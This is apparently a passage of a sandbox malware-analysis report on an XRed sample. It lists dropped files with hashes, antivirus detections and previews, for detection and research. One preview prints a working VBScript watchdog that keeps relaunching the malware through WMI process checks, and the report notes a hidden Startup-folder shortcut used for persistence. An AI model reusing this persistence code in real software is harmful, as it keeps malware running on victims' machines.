                                                                                                                            SHA-256:8445CFA3304BBC48A8616AABA0881A2433E52B839DD5E6234DF8776AE7873C26
                                                                                                                            SHA-512:0D0A77C959BA38555E49C1ECDB5530A8D0D2C0D4BCF4B7BF91A82854D82ED139F0737C9024979F148B67AA2287B087F585B0F9B69F931733B4BDE32D491FECB7
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4413.tmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4413.tmp, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1750016
                                                                                                                            Entropy (8bit):7.48957166237222
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:jnsHyjtk2MYC5GDIhloJfEEaiSgCkqoHisJ:jnsmtk2athlVER3CkqoHxJ
                                                                                                                            MD5:07E25C260C13B82CD867DAEF02255C82
                                                                                                                            SHA1:EBC6562D3EB2A877D8CFEAFCADA1E1AF1A66E208
                                                                                                                            SHA-256:72D043DCD766DA3F32477C3C1612165B2124F347013BBB69BA3DA85EAF9E3D40
                                                                                                                            SHA-512:DCF874250B8B302FFF6BA5466B240660D06613838BC24FF76AB8F060AD8FB6DDBDFD58548034D08AB43906DD4B0F91A3AD2F31FE298DC20005F8A0A48873AFD9
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                            C:\Users\user\AppData\Local\Temp\8EPMJ6c.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2670699863356685
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0JcDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6U+pAZewRDK4mW
                                                                                                                            MD5:D0BB783DD7AB888B1C930D874D0EBE41
                                                                                                                            SHA1:E4692FC71C3EDE7B100CE5310AAD92578DE92A64
                                                                                                                            SHA-256:D1B6C6C65ACC050811DDC3085C7DBDD312E123418C465E0213DC696E727CA7B8
                                                                                                                            SHA-512:294EEA3564F0B5C4970F35C5E30DBBFF3451AA77B0AF29C1BA8C75E86FE24A4B9FF5D793E1EFFF151E355124D376F2F5A4ABE49F6666AA5AD3281E72031D662B
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q3U1MVJmSp5WaUuOyqhadA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\DL1yhkp.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.266199546277303
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                            MD5:73395838E5A6F6868C4920C1E6C04C91
                                                                                                                            SHA1:24B56B28ABE011B9F5A569896AE6D3DAA14E1509
                                                                                                                            SHA-256:DCE50AAECF355A717E3820D478A5D3207BC9861C4A30557C7DF01FC986DB3462
                                                                                                                            SHA-512:4E6DC58781909A7151250CCF14426B0D56AE78EB2CF8BD3FE4A088CFF7B4E09FA935AC3B144631DC612984BA39D053CD2A791E14FF0CFE481B3ACEBE5984CED1
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l2A4SB25BB91UzXsXaNCTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\EgGPXmd.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.25380787355666
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0NqDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kqD+pAZewRDK4mW
                                                                                                                            MD5:92F2635DC1E96AA345D5CCFC25CA5EB1
                                                                                                                            SHA1:90F6BCB4BB4C0F1210D265B0327159355E552A0B
                                                                                                                            SHA-256:F341048BF343BF195E277A9C87C8078300314967D83DA7E635BF73A979B58291
                                                                                                                            SHA-512:A871F7E5559BFECA26BA461399100F5C8AD49D4F0DAA5D2FA854D667AFE867548F6A488371D0EF06BD972D186F96EEF1A378F0FF2CFFFE3197DF1FE643521DC2
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MQfTzygbE5tF5lMLTx0rxQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\I25lJMs.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.244658155892202
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0sCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+nC+pAZewRDK4mW
                                                                                                                            MD5:FEF8F4B916EB86A46AB24E30B8A77E1C
                                                                                                                            SHA1:0AEA46F893A9CA37AACB0EE3DC06E76ECA95877C
                                                                                                                            SHA-256:12DB837F12DD6A741928CDF0B3F2B12FF6D8B8952292C85E63E94F7F39593E93
                                                                                                                            SHA-512:E630C7BE1D35FE9238610A5E989D7A7B908A2BCA10A853B4E7E8E026F270ACE4518BC9F9AD574293D6AFCF71B94388C57A7CABF7A61FE15B189C8E9BE2F2C416
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P-7eaNsno9xsviEn6UhxlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\UgO6EaS.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.268125098283457
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0knSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Nn+pAZewRDK4mW
                                                                                                                            MD5:08673D17E97CCF3FE70BC2766AC491BD
                                                                                                                            SHA1:B6569D82FDB79E70B6FDF56EB61A2522C4029C0D
                                                                                                                            SHA-256:22753011287EB92A98B9577EC8431F1A366C05B2C29CF0D53F4F902B3412BC7D
                                                                                                                            SHA-512:B577888B912638F424E47512AB0379F1D433FEF34A4353677BC8E28B718BEF1ED74D694105D66633224458EEF05776FCB81E087F4E00D40170E9D15FD173AD05
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FGToPRj3Y0oiH9NUxCUekA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\WBHUSK.vbs

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):840
                                                                                                                            Entropy (8bit):5.3504875395593805
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:dF/UF2IU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF4t+G+7xLxe0WABNVIqZaVzgA
                                                                                                                            MD5:08BAC9FF4730CA7A95DD923F66D2A6F7
                                                                                                                            SHA1:A1284ADD696500CF838C32A1126C2A1010680575
                                                                                                                            SHA-256:F8F5031C369B99DB281E4C7C74F2A925F227C2622F9E8E42B36E34D851B85119
                                                                                                                            SHA-512:0FDFB396F73A4F4414CF9AD30D345C998409059DB67AE5E7BF3E4DA773FB04CF6FBB5062ACB6A0B0E5EB3DC38D4F83310B557A5A16360C1A11B49B6D02E32F2E
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_AYRASY.exe"..fileset = """C:\Users\user\Desktop\._cache_AYRASY.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                            C:\Users\user\AppData\Local\Temp\YuJh68K.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258752841764764
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                            MD5:AB7ABD57F2C01C7F4B01BB1834929052
                                                                                                                            SHA1:C7AF9161953420741EC14235D5275B05BD26BBD6
                                                                                                                            SHA-256:EEEAC6BE4412CA721344AC70EA1EF1B9F72D8B4A640EC357FAFEC0AF4CDE0E42
                                                                                                                            SHA-512:841BBFAE02313366018437B1CF7970065BA298573399BE690245DB2E339E6D215ADA18036160DEBB9E75CA61DE495374D4F59BFA9FFCE9F58D85B6E42EBA32B0
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gII6-sEK2LFn3b-3z23ebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\dYzsm52.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.253175507634135
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                                            MD5:928238AAA34C57ABE96E33E9F427B553
                                                                                                                            SHA1:FE1565C845294F82F9D1623E89FFDEB3E84F5A03
                                                                                                                            SHA-256:BA5F0D0F18CA5305243CCF743A45874E93F958EAB3804260957F5131402F8336
                                                                                                                            SHA-512:937910A63B20DE3674613C718A9B8F9707E06613510E4BA369CE98B8EA1F90D375A3F477068B0C933D68A6FFF62FD05C8BC9840117FCC732005479CCB3BD12E5
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cBe2HWypmVq75q_707cyhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\eLc9RiO7.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                            C:\Users\user\AppData\Local\Temp\iPtivI3.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2714140611415585
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                            MD5:FB2114FB9513E0E944BABBDF56943D26
                                                                                                                            SHA1:52F96C9C99A54386F3AD2CBFCC9297BC286C68A3
                                                                                                                            SHA-256:44DC0984DB29C3B006C6200A4553D53270250206ACD62B7B36006CE2386B6291
                                                                                                                            SHA-512:E935595B1689BBD5C645458A12F644F871DC8BEE31993F1B46D0766A3CBC6C2F391C9BE2DDFCDA52BD9D6782626294E087628A12E30B9A670B33BF6223D878D7
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKa6mAGIf36bHXGr68c8Vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\qfn7FBS.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2561264973583
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                            MD5:A22FFC555F884935F4B4A5F23B6D364B
                                                                                                                            SHA1:55549895413ECAACD98A9BAD5B86314C1CDC3C2C
                                                                                                                            SHA-256:8F842C834D697DE860427B64760CC43E1D94D06FEE700E133A2BDC0E77D9EA63
                                                                                                                            SHA-512:E82767D25F2F8903F9A9DBDDA5D45F859575A50D61085A9A92D8208417B28D9BAF197DC5A40E0363B00CB73D50A3C5C108954FD23C642C637817FC69937E5539
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRUZ0p0iT_9DdmBp7qnr4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\~$eLc9RiO7.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.610853976637159
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                            MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                            SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                            SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                            SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFF3ADC856E5C0AEBE.TMP

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):32768
                                                                                                                            Entropy (8bit):3.746897789531007
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                            Malicious:false
                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:24:06 2024, mtime=Mon Dec 30 09:24:07 2024, atime=Mon Dec 30 09:24:07 2024, length=978432, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1814
                                                                                                                            Entropy (8bit):3.4005422202098496
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8UwADdilXUJeabVZjQAJeTEGE2+s9T4IlILZm:8nADdilmv3jnJkjr9MIl2
                                                                                                                            MD5:DA8963990861F942B67E5EF4A6AAF753
